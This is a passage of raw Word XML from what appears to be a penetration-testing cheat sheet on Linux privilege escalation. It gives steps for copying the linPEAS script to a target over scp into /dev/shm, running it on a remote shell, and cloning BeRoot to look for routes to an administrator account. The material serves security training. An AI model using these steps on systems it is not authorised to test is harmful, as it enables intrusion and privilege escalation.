              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME@TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00075A15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162DF013" w14:textId="252B8F68" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:r w:rsidRPr="005F2BC6">
              <w:t>Note that the destination can be anywhe</w:t>
            </w:r>
            <w:r w:rsidR="00075A15">
              <w:t>10.</w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:t>re in the machine’s file system, but /dev/shm is usually a shared directory location</w:t>
            </w:r>
            <w:r w:rsidR="00075A15">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:t>thus files in it are usually allowed to be uploaded there</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:t>access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to it</w:t>
            </w:r>
            <w:r w:rsidRPr="005F2BC6">
              <w:t xml:space="preserve"> is also usually allowed for all user accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006322D3" w14:paraId="13A005AA" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="259666B6" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DDFBFF"/>
          </w:tcPr>
          <w:p w14:paraId="15EF10E3" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6793DC" w14:textId="77777777" w:rsidR="006322D3" w:rsidRPr="001E0F42" w:rsidRDefault="006322D3" w:rsidP="00C40FD7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D05FAB5" w14:textId="77777777" w:rsidR="006322D3" w:rsidRDefault="006322D3" w:rsidP="006322D3"/>
    <w:p w14:paraId="1DC6AB42" w14:textId="07CC61C0" w:rsidR="00546705" w:rsidRDefault="00546705">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D7076" w14:textId="04BD407E" w:rsidR="00546705" w:rsidRDefault="00546705" w:rsidP="00546705">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:r w:rsidR="00B76B2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | BeRoot</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546705" w14:paraId="647A1BD6" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="674B9DE8" w14:textId="2C8E72AD" w:rsidR="00546705" w:rsidRDefault="00132425" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00546705">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1DE258E2" w14:textId="049DFB20" w:rsidR="00546705" w:rsidRPr="00C3613A" w:rsidRDefault="00546705" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>linPEAS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(linPEAS is not installed in Kali by default)</w:t>
            </w:r>
            <w:r w:rsidR="00296EEF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Do this on the remote shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F789B90" w14:textId="220A6A55" w:rsidR="00546705" w:rsidRPr="00D2375C" w:rsidRDefault="00546705" w:rsidP="00B55024">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ONCE IN A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> LINUX</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> SYSTEM, </w:t>
            </w:r>
            <w:r w:rsidR="00F72DF2">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>LINPEAS IS A SCRIPT WHICH CAN FIND PRIVILEGE ESCALATION VULNERABILITIES ON THE HOST MACHINE.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00F72DF2" w:rsidRPr="00F72DF2">
              <w:t>This script will work on Linux/Unix and Mac operating systems, there is a winPEAS version available for Windows systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F4A567" w14:textId="7D7CDB88" w:rsidR="00546705" w:rsidRDefault="00F72DF2" w:rsidP="00B55024">
            <w:r>
              <w:t>To use this script, first you will need to have a shell open in the target system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00296EEF" w14:paraId="2DFA4018" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B8ABC28" w14:textId="688C7C31" w:rsidR="00546705" w:rsidRDefault="00132425" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00546705">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="54611515" w14:textId="3F7330C0" w:rsidR="00546705" w:rsidRDefault="00446586" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:r w:rsidR="00296EEF">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00296EEF" w:rsidRPr="00296EEF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Do this on your machine’s shell, locally)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A5B973C" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00446586" w:rsidP="00B55024">
            <w:r>
              <w:t xml:space="preserve">One way to run the script on a target machine is over ssh using the </w:t>
            </w:r>
            <w:r w:rsidRPr="00446586">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">scp </w:t>
            </w:r>
            <w:r>
              <w:t>command.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB8DCC4" w14:textId="544BFEDA" w:rsidR="00446586" w:rsidRDefault="00446586" w:rsidP="00B55024">
            <w:r>
              <w:t>To send the script remotely over ssh, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">scp </w:t>
            </w:r>
            <w:r w:rsidR="009B155E" w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE/TO/COPY.sh</w:t>
            </w:r>
            <w:r w:rsidR="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009B155E" w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidR="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidR="009B155E" w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidR="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="009B155E" w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00296EEF" w14:paraId="0E626112" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="747999FA" w14:textId="465AA30E" w:rsidR="00546705" w:rsidRDefault="00132425" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00546705">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="78151409" w14:textId="235994BD" w:rsidR="00546705" w:rsidRDefault="00296EEF" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>linPEAS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Do this on the remote shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5E21F2" w14:textId="1D32619D" w:rsidR="00546705" w:rsidRDefault="00296EEF" w:rsidP="00B55024">
            <w:r>
              <w:t>Next, we probably need to change to this directory in the remote shell:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/dev/shm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56296DB3" w14:textId="07C5645F" w:rsidR="00296EEF" w:rsidRDefault="00296EEF" w:rsidP="00B55024">
            <w:r>
              <w:t>Then we probably need to give the file execute permission so that it can be run:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009B155E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILENAME.EXTENSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00546705" w14:paraId="5D8AA191" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F32985F" w14:textId="6CAC3386" w:rsidR="00546705" w:rsidRDefault="00132425" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00546705">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="030C747E" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00546705" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="497D0DE3" w14:textId="653350A9" w:rsidR="00546705" w:rsidRDefault="00296EEF" w:rsidP="00B55024">
            <w:r>
              <w:t>Next, we will run the file and use the tee command to save the output in a text file:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>./</w:t>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">linPEAS.sh </w:t>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>tee</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00296EEF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>linlog.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00546705" w14:paraId="2E2D78EE" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A652B4B" w14:textId="60DDC0A8" w:rsidR="00546705" w:rsidRDefault="00132425" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00546705">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="063A9A24" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00546705" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11380BE8" w14:textId="734F880D" w:rsidR="00546705" w:rsidRDefault="00BB6872" w:rsidP="00B55024">
            <w:r>
              <w:t>From here you can search to see what possible exploits to gain administrator account may be possible, focusing on the red text first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE5D91" w14:paraId="2BA887C4" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CA72259" w14:textId="259DDE11" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="12DD85D4" w14:textId="0182BC64" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>BeRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="183DDC57" w14:textId="1ADDBF56" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ONCE IN A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">SYSTEM, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>BEROOT IS A SCRIPT WHICH CAN FIND PRIVILEGE ESCALATION VULNERABILITIES ON THE HOST MACHINE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01883920" w14:textId="3BB7AF9A" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:r w:rsidRPr="00B76B2F">
              <w:t xml:space="preserve">This script will work on </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Linux, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B76B2F">
              <w:t xml:space="preserve">Windows </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and Mac </w:t>
            </w:r>
            <w:r w:rsidRPr="00B76B2F">
              <w:t>systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5763D328" w14:textId="35FA5A27" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:r>
              <w:t>To use this script, first you will need to have a shell open in the target system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE5D91" w14:paraId="744856D0" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="061FE341" w14:textId="70386BE8" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="105DFAAD" w14:textId="00FA9885" w:rsidR="00CE5D91" w:rsidRDefault="00B55024" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>BeRoot</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(BeRoot is not installed in Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C5FD81" w14:textId="3926A166" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First of all, download the code:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE5D91">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">git </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE5D91">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">clone </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE5D91">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/AlessandroZ/BeRoot.git</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F62C2EC" w14:textId="6EE43958" w:rsidR="00CE5D91" w:rsidRDefault="00CE5D91" w:rsidP="00B55024">
            <w:r>
              <w:t>Then change directory into the new folder:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B55024" w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>BeRoot</w:t>
            </w:r>
            <w:r w:rsidR="00B55024">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00B55024">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
